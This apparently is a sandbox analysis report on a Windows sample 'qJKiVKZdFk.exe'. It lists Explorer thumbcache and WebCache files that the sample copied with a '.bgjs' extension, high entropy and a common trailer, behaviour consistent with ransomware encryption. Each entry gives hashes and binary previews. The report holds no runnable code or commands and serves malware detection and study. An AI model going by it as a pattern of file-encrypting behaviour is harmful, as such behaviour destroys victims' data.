                                                                                                                                      SSDEEP:6:Ua/I7jvgSSrv91JS/ZNavohpvF2Enmii68/Lc5lenbftTbT8aGH8P3ukIcii96Z:U57crv787X4Pp6k4le7F8LHYukIcii9a
                                                                                                                                      MD5:AAC7C02C6D1A4F969DB47C63CAB2823A
                                                                                                                                      SHA1:7B1630C16BD5D82881289EB0C4F3A220F84B7C60
                                                                                                                                      SHA-256:A85DA1AF2A63883115F0878177155CEE0293E6261A5C7C24E59D3377514BF0F8
                                                                                                                                      SHA-512:A59E0BCA96CC2B782B3263C4160D7CB372F6B72AA3687B0E40FF9877614CE6BA370A3C81D5749B5922D8DFE58B4A909134043CFE892F5B3D20E01A3E3F04332C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .q...imW*.~..y...I|/.eZ.Z`...)3.a.v.....=...T..7..Q.}....b>...%.Y..lm..y._..........b....\..f.&#m....$KG.mL..%....Uy...M.g.!..W........1^.*3...C]:`^...O=...$>q)}....I..9.....T..Kh....M......]...>K..@.~;...w^.h.b/.U....5@..G.o........].^...a...&?.#...@.....LM.-.U.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_1920.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.283560777656885
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:98Ct0syMQ6NeDcpXTotj6NPikrHIt1NzXdh2QaMXc8RuVnggm43ukIcii96Z:98Ct0sybUGp65ikro3NLH20+VnlmYuk6
                                                                                                                                      MD5:7E0DB6C09F21DCD517704834208796FE
                                                                                                                                      SHA1:DADBBB1AB5953018EF6F2DB26F0BFFC87F68C081
                                                                                                                                      SHA-256:44706A07C362416B6F2C68176E74D6B62E74B45F7DFD966B62678710AAC58131
                                                                                                                                      SHA-512:F23C11950FABD9923E2A85D17CF0C44A20193285A864058D1592BC84F42018DA94878CA37E9932CF75B6EAA900773B241477ED84CE22E6512DAE18010A547174
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .D.P.*....0.;....o........Fk9a.e.U;.N...k..,....U.......%.s*....l70...v8....l3.;.Ci.9..r.Q<^.{......V...B.E.........E.a...?U..(....z..o.zL......K.\./h;..OA.7A...3../1..O.w%.._Zt.eH...V.3.9@x"*1...QuzI*T.._.l..<v_...>.a..P.y.y"....2MM.}...-...."R..t..#..p..E...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_2560.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.333884834726726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:9stRrHh2r/Wat4R/jru24/GIsf4Fjm4FWfVwevx7aRoJT3UPpog7zj43ukIcii9a:GYTWa6R/jru2yGIsf4FjmVwux7tT3Wpd
                                                                                                                                      MD5:419FDB6827FF502365AE0A8C1BEFC328
                                                                                                                                      SHA1:A39D682E790AEF71D227F49333BC5549F3974040
                                                                                                                                      SHA-256:769EC25BFE2783112843946055AA0BFF78B223735105DEA1381B9BC5018165EC
                                                                                                                                      SHA-512:67BA498FB584935218C9EF9B0AE40C314C6867A8A2D6C2A624761A1F512E3E83EAB5B6046F1CBF6409B2AC3286C16D1563A2381F763A5EEB1777EAE92B61DF6C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .Y...w'.....Q.H.G..~..y.`;.crY...4.Q.....+..Y...q..#......)[Gw"..V...?O.)...0l;...+..j1...0...k.W.vo...%........P.....r;........._Z11~XC.-.....U.V.........10.\ r....H...".+.f....,}.=..2Y.Z....3....%...U...^.j.l.O. ..X......;..Nw.$...N.......<~..._.B`.i..O.>.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_768.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.250158107209864
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:xwCi9m1Y5tGeYWVeyhvtV5UB90T9uBNameoawvbcFwO6qpKsWeBRV83ukIcii96Z:lkmeYW0ylt/UzqMBkLop4eOBp1YukIcq
                                                                                                                                      MD5:85ED34E76BCAC901D1F4E308402F1824
                                                                                                                                      SHA1:5BD6F7D6C7A91119596246479EBC91B82B3E6CA7
                                                                                                                                      SHA-256:30CD0B0F9ED34886D1E8B71FDBB5F14D162923B8AD21F1F59FD322E3987CA10F
                                                                                                                                      SHA-512:2230EF93BEC7E885C55B1D05B6E43E317493E82269E0B490E69A2F1A0BEA0B7BB3EE959C0560AC74C793E57D612D5A9E2DBF60BCE1772BF6EDD97FCF4CD441D7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .m..'.....a[....:.g1).....~.u..wv"...I..$..p.....q#..^{..$H.E.p.}?..s..y.......,...7....P...&r.:..."_.....n...Q......H.a./.j.8.S..Qv]...t...(a.K4..a..9..c..9...:..ds.G06[...a..$.<...f.N#.<t6 hcH9.j6....`....x.q./.y ..\.t....i.X....!...nl6.&^w;}..*R`3..C..T{@[...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_96.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):4.326840977839256
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:/utdaVnFNVQ2I8wHXJH9KPauPgnr/GTvYImqrYEz7xiFmi6xV:WTSnFNV+FH9KyuPMr/oeqrYEz7xii
                                                                                                                                      MD5:CA8D41655B93729E4742C23B578C45A6
                                                                                                                                      SHA1:BBEFBF20BC9B6B5F602C130FB891FE458E985E75
                                                                                                                                      SHA-256:0091C8455D077AF19A7C953AA83F70A7A9C33838B927B208C0B54B4117B42D69
                                                                                                                                      SHA-512:389F5525EA42C03DC242648E1457FAF01FBB9FB5D5DB088A5B51D0A18CA0D2344F2BED0F4A35B6CC213AB52312EC734F504B66385F61C435AF62AE90164D5B19
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM ..P..~.....e.v @.Sk.fD.E.......zB5..Q.Y_.-.nei..........Q...D.#.......z.B....dV.=..w^..x..K.S .l..g.E.m.G.....&\T.S........92.#:.k..g6e..:.Y..(...J1.S.t6b.._K.l.v...O.7.\,.%.....X..U.....A.Rk.PP8.di..x...K.b.>.[..d.}.f.0F...5.nS....C...:qh64......X..N.)4......>|.........$...6? .SI......m..[.Z-`."...[. ..zVZNh.6..8...c..}...F....}!.....?q..+....e.N.H...U..e..m~....l9..]$\SU....G...E..c.Kou..u.N.)T.O..7.A.H]}..P..,\.^u...o.~.d......>.?......y..v.o.u&>..l..(.[.t...!EMm..(....3..4...:Y=.....$.:.!ca,":.p..[fAr..{....`.|.,.0..QW.`.A.@.5w....o....[...v..dp.#......N.Z.3.C..7...!hJ....>..@fN.'-z...H..hMj.|..8.e..anu&..=!/t.oZ.....,F{..%P..M.#..n........>h..!>...t)...%...E"A{..i.[e............3..=..y..C.~..Aj...aV..f?..vj6]..;..I.A...\....D..?~Q.e..@.$l...+LN.V.ghc.0.8.r..Y.oG.G..9.[s.3.S.p..>@....o.Y......FR....a...3.B..Q..p......cpy.....s;#...o...3....oP.}.._o!.)v,.m.2......k...<k.R. .dk..`...^..5|..6.oY@W.W.O.H..K.D+)c..4t.....i..

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_custom_stream.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.305349238717724
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:Hh7mxY3lmkKzj8bFzSK7FkTzYXCkcvEpYjcPBs6jS48HZgXpPyP3ukIcii96Z:UxsmkK38dSgyzOcJoJDjS485SpiukIcq
                                                                                                                                      MD5:FA575339FA078432E1E54F0BAF0B0E9D
                                                                                                                                      SHA1:7EEC0622E5A9E0E09602DFC2B6917DB0EC763D81
                                                                                                                                      SHA-256:0EB67A79E95D76125CF42D81F8E36ED52A64E494D7B5A18B2157C201A78E87F9
                                                                                                                                      SHA-512:ECD35277090CB221341623C209ACD877BE0E8DE70DA3B8E4DACBC8E40FB388BAED815DEDA7C9DE8FC346DE35BD5ABEFC6E92A66118F3B4C4904BCE1CB0185CC5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM ...5j.J..t..!.>..^{.,..t..c:...>|M..6}.}.J...8..V.*lEF.5.)...S.......^...s...{]^.....G..y..6.$...'./.......#... e...Z".....t".o..UJ3...4^.....Y....q..4....).Bvo.....G.e/..)wS.2R>..N...j;9.^.y.x.C..a?L.._|......U.....|......s!.Qpp.......@...AF.....6W...x..S.'.@=..Ttp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_exif.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.2225238631467645
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:hGoxxuef2BFDabyc8LjlU7IEAOXpEaYSRItCIErG0Wl3ukIcii96Z:IoxxJfQpF6IEzX5YSMCIESFukIcii9a
                                                                                                                                      MD5:5A5BE70B095F20F670B5B894F5339E88
                                                                                                                                      SHA1:CD637C73BF66ABAC64F9EC958DB14D77BC50D405
                                                                                                                                      SHA-256:7630FDB69152325E1E0498B5E97647B95B1A8942BF91979A04D368F1BACF14B5
                                                                                                                                      SHA-512:20BF4E938726E216FCFE02DC16731E792B5C5AACE41B3572D6EEBD8B0FA72FF3F4E1883BB394073F5151AC4494E8BD6C913389BB0DBCFDFEAD85C20824EF07A9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM M..kK....."........j..0.doT....BH...=.d'/...Z....`.y.?..j.,t%....G..w..:...t.?.,]....y. >.{)..m.y).....'....s.....}.....Nv.!..cwE...Y.B.D..M-....4<.m..*...K'.2..t....' ...A.*.....4_..=.d....:..>.}>..Tr.wQ....$..ph..y>..?..Ub.\..T...7.....H<...!b.~.Gy...s.q...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_sr.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.24649876624867
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:QAcZ+LUy3AKeutMioA73WomeefGkmdM1PCZEpq4+du3ukIcii96Z:VjLp3JmizGos+/OFCZANi+ukIcii9a
                                                                                                                                      MD5:DEA6D491DAFC594A06164072225D9B45
                                                                                                                                      SHA1:B78A59CAD0E76DA312144FDFC7C3E58624882029
                                                                                                                                      SHA-256:BE18DAA60BDA10C5319ED7E67CF87D5CB23721358ED997CEA2FB8B3B4BA77B25
                                                                                                                                      SHA-512:7EAA7644A132C5BC91FDB0F3A9162393BBE51B31248FB582C625D4DE67A1C6985F4DB2A7CB1FDD2B72132B73AAC83B443AA4F9F271BD50C8F66AA456A51CC322
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM N N...h.w.9!'J%...%.....(..}.<[..s...c."..H...R..V....d...V._."..>.......Y"T=...iz)N.d..^^96.z...f.=..qF..Lt.......jJ...c*..S..\+..d...p Z._Q...3t.*.&..'..0W.u.....;.k\.......q.......et$..&0m.^.88j>.as[..i.g.w........*.Y()....aFc'..+.........{.q..w.P@....^..\e.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_wide.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.316062096158001
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:mJWMWTmFtOxAKLfvc7cbr9LJ64FGv1AEFx1IhqlolPv3r43ukIcii96Z:mYMSytORLf5brX61AcxCCWPzYukIciik
                                                                                                                                      MD5:E67F5235B1726986EBCD05883CC14549
                                                                                                                                      SHA1:B045457648CFCCCBD7B53F24B486D995C4B1805D
                                                                                                                                      SHA-256:B7D4ADF5174D03C24878A19A52EA97E93BD43D618085CE016968CCB184FACCC6
                                                                                                                                      SHA-512:AAB6F2E3B01E1D7CE239FE29621D4FABA2CF91C50BA2936B4EF298DADEF4016797C84C2A82C083D6637E50B964BADD60C0F8F6E46B38049CBF71BACE9A12C1D0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM A:Ex..i..A.ul......{........t./:B#c...^......w.....Y..K. X....x.N=...>pH...!G..~e_..,...'./XU<&9..D..%}pgk...Y......R...P..-#...Y..r..*y...x.H.>...L. tW.uj.I..Aj.4...i.,.y....5.1.....F.EN..>....3x..X{..t.:...[HAd....}.....9.Q..:...2..5.a8T..B]0...;RP...ii.9.rp......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.280478646238559
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:hjNEBXbSxAdlIm8TFWYoL6B1bqo7meUe8vG9tMT2CmS8WX5cnS33ukIcii96Z:hhE1Sx+fiyL6fi+ZnfW5ukIcii9a
                                                                                                                                      MD5:91FC6E73FFF2F256812EEC15F480E491
                                                                                                                                      SHA1:2180FF7286557DA400B0933F07CC70C813BD3058
                                                                                                                                      SHA-256:6039F70D88EB7B10A3AF7F86670EDF7F05FD849110A424A8FC99E01066683D3D
                                                                                                                                      SHA-512:7E026168EA7F02DF0EC483DABF29B7DD62F082FB0B2E710307E140F2AB437F9CA768B3265EFB3A219E6F19571817DF3B0BBCB24F7099FAFAFE724288368EF81A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM jjD..4.{.....B.~.'.\j.G.0X&...r.P"....e..H.N....w....-...!.2......7.D....O....i.l.e..13.mS]+.q....k..O.X.2....$5.~j.....T.A.!av.+..G.....`..{!..=g.K....=.RhB...5......)....=....T.T.^D..p....b.vS....$~.b.1.....<8.6~n...@H.c?.|`....M.gq...p=.....O...W.4C. i..v.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):64281
                                                                                                                                      Entropy (8bit):7.996895760350316
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:51OXluEDAdsujOPtgDGXefqukmN3s2FO1QLzEJ/sgY1451uN84b3kKkKDXnMyGz7:5kBAiKDJumWSEFH4HzMyYNVmGgq
                                                                                                                                      MD5:9F3032582FEABCA9090DC2B8DF7AC0F0
                                                                                                                                      SHA1:B574A6D8B5B1990F7FB982F3B4CB6E1AACF9C2AC
                                                                                                                                      SHA-256:61843AFC77F145B4CF5D6E32BCE758924DD99E498CA05E6E425A09996A873FF5
                                                                                                                                      SHA-512:CC53A07046727BE0647B002929CB4F00797EDBFDE0C351C2C316EFF22F6E7C40ACB9ED131C690B5818458AB7742B2603ACB067936ACFEE2CC5AD7FE5ACEE1DF2
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:<?xmlO.Kd.'.N\,.8Z.%+r.*.G...W2.%o..i..N|..)...~.}.3..F4..B.z%).`N..N..II..^].1.+VS..q.W...X.3..%6 ZR...]0.uJ.qJB3Jj.yQ..6....K..'...rXW...v.....v....K...h.ekh...................V./eb.+.*.^iD.SG..X.z.. ..q..Wf..(C(=.m.T...Zc...Y........f.4N..Yvv...e..$\(....yQU.p......g....S....H.../B}./+X%.l..."...p...PgM.M0B...^.;~.jF?R.%..<hev.-;..3BQ.M .T..A...<..$...h...+....].l..v&.....!.....s.(....6.^ph.uHE..?]L....3U....4.8..fh..$../..po.!sP....:M...x.C.........W.^.-.g....^.."..|U.Hf.S(...!..&....x.;./..kX../.:_qB...b.z....d........::..1ke...).G.zZ..9Y..U$K.3....h<Y?.z..R..-.'..........-..y..?-.._7..).oZ(....%.^..q.. h.A.u.a:..+.....V.,;.....T..a_...rV...p.}...i.(...x..........I....Wb..V.\".....i.<.c.Q.....B.....Y1.x.V,1.....$..O!/...U.nF....s./..^...NZ.....+)Y....%=N.;...z....%..V..;.^;^&@.....Vu...y$...tno....N=E....P....F.'..rB....{@.C..s.`2...+ S..+...P.3.h........&.k.....f..v.;.6w..s..r...X..w..s!..r..e....Z.2...m7.^".,...?..9.......$T...J

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01.chk.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979889448990492
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:K3xhOY5tZRXIHytdJacmoSZgSjY48Yxx3quswueY6j:KBwY5tZRXoyTBRSb5xxAgj
                                                                                                                                      MD5:7F9CD241166817800BE30B6377FDD6C5
                                                                                                                                      SHA1:ECB314147416D26DEF3765E1C5029A1BF58C1934
                                                                                                                                      SHA-256:0801428DD6EAB2B60353BFA6D68E3E9A3ED3417D03CE39A43C94DC46E468475B
                                                                                                                                      SHA-512:681CC96AB783C5B95ED5C72C75741CE7097C42A73F60645AAD6471E6E17EA35854D7A8F6FA36175CA9DE3D48CB456E0008B19914616FC378B5AEDEB09A8DCC76
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.p.|...5.S...mqD.|b..tr.........1.v...&>..*..U.i..B..2Eg..j...AO..U.Y......k0c....8$R0.P....zB.x.u..w.Y%..j..]\...H?,...;.X....`.q.U.W....d..K.3/?Z]..z..!..iu...k.'..h?..V..!|...{....%.2'_...fV..x........u.Pt.@$l.I.r.... ..1...Vz`..P....wpG.o...=M7+..*..[e.n....*-u...$.......}r..|.}.c...m9.._L..3B&$....a_..!....P..m...P......i.....,..QB:.u..=...OY.u-.....u...&.~..X..PX..........[ja.....2..\..v..F.`R.......{...J.D...I^ZD.*.W....b.S.~6b-.....Q..R....cw..;..M...|....b7~k.6.U.N...../...u..6."....v.....600..^.W.=.E.7....N.........3..2...'.j.s\.......j...4.|.HJ...............i.(.".M.^T.Lln0..J.+L.C........V.p.....T.s.?....Z.:.(....t..o.}..B....N............3.w,....R.:...s....wzc8...*W}..Q...."..c.{RC;M:.m.p.r....'..yQ^8.....=0.o*....r_...XG.g....`X......s...[/Y.....2.K.&c....s...dg..-.\s..w..s.IU.{h....Z.....~#.#.......gu9_-..p... ...+."..-.$..RM.......2...%/o........uL.B6.z..P./...,...!a...E..Y.K...M._'#....}...GI.=.....^..=...R.\

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V0100004.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):7.012213429418872
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:JqONnyg4QNn3uosOs+WZX2UvUZ56mwBJeQNy6tsM0P8ATX1BK8O2Jzy:UOsg4e91WZXQryyA
                                                                                                                                      MD5:5E902A952281405DFD38BB8893ADAE5C
                                                                                                                                      SHA1:4461814FDC5166FF68E5692836D453C91B318273
                                                                                                                                      SHA-256:C84AAD46446661971DC80A57AE5900FB898BCDAE7C2EA19E6A89A801C4CCE579
                                                                                                                                      SHA-512:CF40707C4C87805954886236567F3BD16BEB29C340DE347944973B357D00B7A2F1E49D1AAE13F9C7A44F442FB99F39C5EFA8DD1ACDECEA7D28352E4402FD433D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:w.I`...?...n.^..o.#.%....o.tlK.%..s..YS...x2.g.|h.6^..H.%s.,|...x..}.[=.Yx.#...u'...Z..d....n..M....i.ly.u.G....;..(..x.E.Z..3.."...R;m..4F.k...?......V.8...k..3..(.C..<..2.8g..k.gG..M...........e}......>1.2.2@ ..z...{.+...I1.T.IU......'=g..+.5..1../.e..h.2.dI.M.A.WD..\I..I.`.fJ.q.nN....^-..'.1.RZ...j..y.+R+.....YN.-...&..|..DT...........}....=.s......ruE.N..!....^/.,.fo&.Y.7...c..`d..-t...i.@..)........n....g.z.....*/G99b......6..a...J.p3`dj/...;S_.t..(..j..}..+FT...n.!..U..D....k).d>Y.q;.w..4.w(...{.L.L.@abe.g...e......z...Ll.........X.=8_.KU..e..d....E.1..6.N.6:.H..t..a....#.<..@..C{.Y.......k...0M.C.+wuZ..R=L.....%UO..............!dX.;.....7]Vr2....'........v9...a..._..+.}....]`...x.r`C.y..8.........+..%x..Tf#.4..AC...D.J4.S.V.~E._...w.......x...f.96.~.2...(......_...n..d...Z*G.S6..B..j.......F.Q.,W.$....._.N....}u...._.r_.q.fgz....V.(Lc.&..)..+.Q.f.%....S....C1....9..R'L.r..p.1........N_...4..~.5"..X0..G..`9..>...a...+O&N..D...

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01res00001.jrs.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):3.20852564083687
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:xgSqTMW9lduqSx5OHNyipA0txLnmSljgH+KS2EPrL87Y:uTpzuENyiLnmSCeKNE/L
                                                                                                                                      MD5:EA9AA1A75B819ADC3F3DE3E81DAD08F3
                                                                                                                                      SHA1:F1561BEF8EF68EA03B43A78231444AE6052856B3
                                                                                                                                      SHA-256:C01AD500CA5A391D8B0A58C7BE322D22933BFE6C2562A1F0523454099E97B7E9
                                                                                                                                      SHA-512:6BF17B768584AC2CD162E68B8073353F070CD20BB3841B19298225E65CCB5093AC1C2844285B79A7C62DE876D6EDB471DAE760DAE7886645C95A7C361519D1ED
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......r..#k.dl.e.a.2s4sO..d.jN.M#...=..#...BL.q.F...QR..P..r..q."a.cl../.q$.....T...ct.z>.r&...YCI.....%D.E......<...H..V....q/*.......CO.....R..u..H<L.==`.....+.A&lZ."...{S..s>..q...]5m.7.l.x...W5..{H.U.,U....%....L.C.....(..m..V/.=6YO.d..~3L.g..Zdh...;lF?..O.>Hy..."._4..Q...^.../.a....).....oa%tV.....d;.G.c.S.O#.(.9)>L+srpf.9.....Q`.W.....;....?.y..0....:..\...1...>.{....Q..IgI.H<...'..:.g..p->..|+......lg.M........f..?%...K..qI#."E;.o$...&.. VJ...o.`..Fs...qX|.....8hq.B..3...."..s.u.x....i.....j@\... ...8.K&cry.I..N.R...J>.I.MD...3.t......y#..RL9.....,f.tR.11.Z..D....[}&....3W.....:P.B..:.fQ.H.._M.(.....<....O..h...<+......Aw....y.+.}..L5<.L<...........8...n)$,..6)..i...?U.|)R..$..8.......l.{ah..`.?K.t9N.......3..3....U.P.:....u...B.4h.I.m........`.........e.O'3CW?]....>g...~.$<\!...W@.....T....|..Jy-5..~...H..S...W..<].t......<."Z{....y...G.P@.9..!B..C)...z.B..i....-IW..m4...HH%u...Z...1T.8P..v.......T<.o....T......?..~[...*.

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01res00002.jrs.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):3.208077766109632
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LYZv3vdE9WAcBAAEhuiuPiwp6QVgzSC2bcOpvaXDi32cZUpapQ:Ls+WFyAEXuPzt9YOpGm32cZsapQ
                                                                                                                                      MD5:456E7B6F9CB20794874A4FF7B83D800B
                                                                                                                                      SHA1:E55E198861756E4FEA7BF1C77B2EC86A8C5B43E4
                                                                                                                                      SHA-256:A33BA52A38E51F16891D13429BAA128417D409EAE6520B432D10603EE0E6C742
                                                                                                                                      SHA-512:255D4B5A72EF0B85CE029CD28A76F6BAF57FABDF1C9301EA82F99B432266120F53AB9F9655BFF608885AB784348B2155A6EE2EE56E60F1FD756D2A3F9156469E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.....b......J:Y.`....?.._.....DL..2*O..M.s..>+*.B.X.%...xc..R.|..R.....Q.i-;......^.`..(....z......L%6...u,...RxZA...FW}.4.D...{6.LFKAn._....qa..-..!:.x>.......9..K.q..O/z....)f6d.e.E.O.ilA...Vs.a.2...}..b.U..h~wo=l{..#..Z..M..|;5.......g.D..8.7.9..;P._/...~7...7...Y...?.....H...g.Ib.W.6..u.X...989..<-,.|<...z.z.cF...rI.K...vZ.....5.>..g.j_'+........R.."...N7{9u.t....*/.._......o....-..qH...A......|...W..Z;..-.-[^g...H...Z"q.Z.E55v..NI..}3.d)ds|.-...8m....h.....)9b.o.f..[.x$CP."..t....X.... vH..61.J#[jA.,A*',"f.....v.x..N....<.w....h.\@....~........'....X..a..:..{.Xe.yyB......4..Fd...Y]..b.Dc..l.n.N.}Uw....!.3.....HPd...$E.c?...\.......lE...8.....*....=.........h.....&D...1.....4._)a..s.a...e].I..%[O(...Y..........z7L0q.x....x.tO7..8.~..eI.....,;.W~e..=.60c..PRh....,6_.&A<.3>F.l.4)...+.`......R....."ZRaV......+:.v.-...}..h...:....J.;.h[.@.5a...l.V%f....-.o.IK..*.....-.[.0..`:cq..k...v...1.?..Z..HaK.....n5..x.l......Oy.{.~{...I.@.y.d!m7^......8..

                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01tmp.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524622
                                                                                                                                      Entropy (8bit):6.6646380308826805
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:xYnSgF9htUoB6zefK8HNzGwOfLK0eBQ6GuwlcTKcBwqGQguuleoxvTxcZxBvxdhr:xYnxB/K8HNzGwOfuglttEjxz
                                                                                                                                      MD5:4FEC1BE6BB61305E1B461C55FBD463E6
                                                                                                                                      SHA1:625B52E5FC39847BCB1564AF4629B1795D330A7E
                                                                                                                                      SHA-256:CF26878168B594326966B00FFC5B89212D66D499FE4E533AE99DC2C510E5DF0F
                                                                                                                                      SHA-512:532C54FFFFD75EEDABAC6918727AE2A8EE9E3CDEBE7A08315653B7EFDA05CD3F0293B63E8F409263953530629D00451F62E708E7E69EEAF1E41CDC919B6566F7
                                                                                                                                      Malicious:false
